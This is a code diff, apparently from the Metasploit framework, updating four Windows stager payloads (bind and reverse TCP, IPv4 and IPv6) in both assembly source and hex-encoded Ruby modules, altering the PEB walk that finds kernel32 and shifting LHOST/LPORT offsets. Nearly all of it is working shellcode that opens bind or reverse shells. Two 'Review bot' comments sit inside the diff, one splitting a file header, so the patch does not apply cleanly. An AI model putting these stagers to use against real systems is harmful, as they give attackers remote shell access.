diff --git a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
index 68d66bfc52..bb2ebfbb7d 100644
--- a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
+++ b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
@@ -67,9 +67,10 @@ LKernel32Base:
 pop ecx
 mov ebx, [fs:ecx]
 mov ebx, [ebx + 0x0c]
- mov ebx, [ebx + 0x1c]
+ mov ebx, [ebx + 0x14]
 mov ebx, [ebx]
- mov ebx, [ebx + 0x08]
+ mov ebx, [ebx]
+ mov ebx, [ebx + 0x10]
 push ebx ; kernel32.dll base
 push dword 0xec0e4e8e ; LoadLibraryA
diff --git a/external/source/shellcode/windows/stager_bind_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_tcp_nx.asm
index 07f0afff08..c0768b8921 100644
--- a/external/source/shellcode/windows/stager_bind_tcp_nx.asm
+++ b/external/source/shellcode/windows/stager_bind_tcp_nx.asm
@@ -67,9 +67,10 @@ LKernel32Base:
 pop ecx
 mov ebx, [fs:ecx]
 mov ebx, [ebx + 0x0c]
- mov ebx, [ebx + 0x1c]
+ mov ebx, [ebx + 0x14]
 mov ebx, [ebx]
- mov ebx, [ebx + 0x08]
+ mov ebx, [ebx]
+ mov ebx, [ebx + 0x10]
 push ebx ; kernel32.dll base
 push 0xec0e4e8e ; LoadLibraryA
diff --git a/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm
index 6cceded2be..3a4fd0e10c 100644
--- a/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm
+++ b/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm
@@ -67,9 +67,10 @@ LKernel32Base:
 pop ecx
 mov ebx, [fs:ecx]
 mov ebx, [ebx + 0x0c]
- mov ebx, [ebx + 0x1c]
+ mov ebx, [ebx + 0x14]
 mov ebx, [ebx]
- mov ebx, [ebx + 0x08]
+ mov ebx, [ebx]
+ mov ebx, [ebx + 0x10]
 push ebx ; kernel32.dll base
 push dword 0xec0e4e8e ; LoadLibraryA
diff --git a/external/source/shellcode/windows/stager_reverse_tcp_nx.asm b/external/source/shellcode/windows/stager_reverse_tcp_nx.asm
index d876003e30..a735fae269 100644
--- a/external/source/shellcode/windows/stager_reverse_tcp_nx.asm
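Review bot: The new walk `mov ebx, [ebx + 0x14]` / `mov ebx, [ebx]` / `mov ebx, [ebx]` / `mov ebx, [ebx + 0x10]` swaps one set of bare loader-structure offsets for another, and the only comment in the hunk is `; kernel32.dll base` on the push, so neither the field each load dereferences nor the reason the list changed is recorded; the identical hunk appears in stager_bind_tcp_nx.asm, stager_reverse_ipv6_tcp_nx.asm and stager_reverse_tcp_nx.asm. Each load should name its field, e.g. `mov ebx, [ebx + 0x0c] ; PEB->Ldr`, `mov ebx, [ebx + 0x14] ; Ldr->InMemoryOrderModuleList.Flink`, `mov ebx, [ebx + 0x10] ; LDR_DATA_TABLE_ENTRY.DllBase (relative to InMemoryOrderLinks)`. The result still rests on kernel32.dll being the third entry of that list (head Flink, then two more Flink hops) rather than on any check of the module name, just as the removed 0x1c/0x08 walk assumed a position in InInitializationOrderModuleList; a comment on LKernel32Base stating that ordering assumption, and whatever OS change motivated the switch (not stated on this page), would save the next maintainer from rediscovering it. The assembled bytes are hand-copied into four Ruby modules further down, with the LPORT/LHOST/SCOPEID offsets bumped by the two bytes the extra `mov ebx, [ebx]` adds, so the reason for the +2 shift belongs next to those offsets as well.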
+++ b/external/source/shellcode/windows/stager_reverse_tcp_nx.asm
@@ -67,9 +67,10 @@ LKernel32Base:
 pop ecx
 mov ebx, [fs:ecx]
 mov ebx, [ebx + 0x0c]
- mov ebx, [ebx + 0x1c]
+ mov ebx, [ebx + 0x14]
 mov ebx, [ebx]
- mov ebx, [ebx + 0x08]
+ mov ebx, [ebx]
+ mov ebx, [ebx + 0x10]
 push ebx ; kernel32.dll base
 push 0xec0e4e8e ; LoadLibraryA
diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
index b0abb5973f..8e1aac28ed 100644
--- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
@@ -38,7 +38,7 @@ module Metasploit3
 {
 'Offsets' =>
 {
- 'LPORT' => [ 253+1, 'n' ],
+ 'LPORT' => [ 255+1, 'n' ],
 },
 'Payload' =>
 "\xfc"+
@@ -48,22 +48,22 @@ module Metasploit3
 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
 "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
 "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
- "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
- "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
- "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+
- "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+
- "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+
- "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+
- "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+
- "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+
- "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+
- "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+
- "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+
- "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+
- "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+
- "\x00\x53\x57\xff\x55\x18\xff\xd3"
+ "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
+ "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
+ "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00"+
+ "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49"+
+ "\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed"+
+ "\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7"+
+ "\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff"+
+ "\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00"+
+ "\xff\x55\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55"+
+ "\x2c\x89\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff"+
+ "\xff\x89\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55"+
+ "\x28\x53\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06"+
+ "\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00"+
+ "\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"
 }
 ))
 end
-end
\ No newline at end of file
+end
diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb
index 9869a0fa3d..a1a03b183c 100644
--- a/modules/payloads/stagers/windows/bind_tcp.rb
+++ b/modules/payloads/stagers/windows/bind_tcp.rb
@@ -34,7 +34,7 @@ module Metasploit3
 {
 'Offsets' =>
 {
- 'LPORT' => [ 245, 'n' ],
+ 'LPORT' => [ 247, 'n' ],
 },
 'Payload' =>
 "\xfc"+
@@ -44,22 +44,22 @@ module Metasploit3
 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
 "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
 "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
- "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
- "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
- "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+
- "\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49"+
- "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+
- "\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+
- "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+
- "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"+
- "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"+
- "\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"+
- "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55"+
- "\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff"+
- "\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18"+
- "\xff\xd3"
+ "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
+ "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
+ "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00"+
+ "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49"+
+ "\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed"+
+ "\xfc\x3b\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7"+
+ "\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff"+
+ "\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30"+
+ "\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31"+
+ "\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55"+
+ "\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7"+
+ "\xff\x55\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a"+
+ "\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff"+
+ "\x55\x18\xff\xd3"
 }
 ))
 end
-end
\ No newline at end of file
+end
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
index cbc275f5e2..bdf8d54682 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
@@ -39,9 +39,9 @@ module Metasploit3
 {
 'Offsets' =>
 {
- 'LHOST' => [ 246+1, 'ADDR6' ],
- 'LPORT' => [ 240+1, 'n' ],
- 'SCOPEID' => [ 262+1, 'V' ]
+ 'LHOST' => [ 248+1, 'ADDR6' ],
+ 'LPORT' => [ 242+1, 'n' ],
+ 'SCOPEID' => [ 264+1, 'V' ]
 },
 'Payload' =>
 "\xfc" +
@@ -51,19 +51,20 @@ module Metasploit3
 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
 "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
 "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
- "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
- "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
- "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+
- "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+
- "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+
- "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+
- "\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+
- "\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+
- "\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+
- "\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+
- "\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+
- "\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3"
+ "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
+ "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
+ "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00"+
+ "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9"+
+ "\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32"+
+ "\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a"+
+ "\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2"+
+ "\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50"+
+ "\x6a\x06\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00"+
+ "\x17\x00\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00"+
+ "\x02\x1b\x63\xff\xfe\x98\xbf\x36\x00\x00\x00\x00\x59\x6a\x1c\x51"+
+ "\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56"+
+ "\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff"+
+ "\xd3"
 }
 ))
 register_options(
@@ -72,4 +73,4 @@ module Metasploit3
 ], self.class)
 end
-end
\ No newline at end of file
+end
diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb
index 4499224d49..0884b914d6 100644
--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -34,8 +34,8 @@ module Metasploit3
 {
 'Offsets' =>
 {
- 'LHOST' => [ 231, 'ADDR' ],
- 'LPORT' => [ 238, 'n' ],
+ 'LHOST' => [ 233, 'ADDR' ],
+ 'LPORT' => [ 240, 'n' ],
 },
 'Payload' =>
 "\xfc" +
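Review bot: The regenerated template in the `@@ -51,19 +51,20 @@` hunk of reverse_ipv6_tcp.rb replaces the eight zero bytes that followed `\xfe\x80` in the embedded sockaddr_in6 address with `\x02\x1b\x63\xff\xfe\x98\xbf\x36`, which looks like a real link-local interface identifier captured from the machine the stager was assembled on rather than a placeholder; the other three modules on this page change only by the two-byte shift. Assuming the `ADDR6` patch at `248+1` overwrites the whole 16-byte address at generation time the value is inert, but it ships a build-host identifier in every default payload and no longer matches the asm source, whose hunk on this page touches only the kernel32 lookup. The added line should be zero-filled again, `"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51"+`, or the template re-assembled from the committed stager_reverse_ipv6_tcp_nx.asm with a clean placeholder.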
@@ -45,20 +45,20 @@ module Metasploit3
 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
 "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
 "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
- "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
- "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
- "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+
- "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+
- "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+
- "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+
- "\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+
- "\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"+
- "\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"+
- "\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56"+
- "\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57"+
- "\xff\x55\x18\xff\xd3"
+ "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
+ "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
+ "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00"+
+ "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9"+
+ "\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32"+
+ "\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a"+
+ "\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2"+
+ "\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50"+
+ "\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22"+
+ "\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6"+
+ "\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56"+
+ "\x53\x57\xff\x55\x18\xff\xd3"
 }
 ))
 end
-end
\ No newline at end of file
+end